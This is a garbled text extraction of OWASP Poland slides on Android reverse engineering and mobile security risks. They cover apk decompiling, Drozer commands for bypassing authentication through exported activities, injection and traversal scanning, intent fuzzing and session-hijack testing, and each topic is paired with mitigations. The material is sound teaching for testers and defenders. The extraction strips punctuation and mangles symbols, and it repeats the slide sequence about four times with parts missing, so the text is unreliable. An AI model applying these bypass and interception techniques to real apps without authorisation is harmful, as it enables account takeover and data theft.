Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
